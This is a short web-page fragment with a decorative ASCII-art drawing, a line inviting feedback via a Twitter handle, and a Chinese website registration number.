; / ` } } `, `-`-.___ / `, ,/ `,/
\| ,`,` `~.___,---} / ,`,,/ ,`,;
` { { __ / ,`/ ,`,;
/ \ \ _,`, `{ `,{ `,`;`
{ } } /~\ .-:::-. (--, ;\ `,} `,`;
\\._./ / /` , \ ,:::::::::, `~; \},/ `,`; ,-=-
`-..-` /. ` .\_ ;:::::::::::; __,{ `/ `,`; {
/ , ~ . ^ `~`\:::::::::::<<~>-,,`, `-, ``,_ }
/~~ . ` . ~ , .`~~\:::::::; _-~ ;__, `,-`
/`\ /~, . ~ , ' ` , .` \::::;` <<<~``` ``-,,__ ;
/` .`\ /` . ^ , ~ , . ` . ~\~ \\, `,__
/ ` , ,`\. ` ~ , ^ , ` ~ . . ``~~~`, `-`--, \
/ , ~ . ~ \ , ` . ^ ` , . ^ . , ` .`-,___,---,__ ``
/` ` . ~ . ` `\ ` ~ , . , ` , . ~ ^ , . ~ , .`~---,___
/` . ` , . ~ , \ ` ~ , . ^ , ~ . ` , ~ . ^ , ~ . `-,
Contact me via Twitter @zayotic to give feedback!
浙公网安备 33010602011771号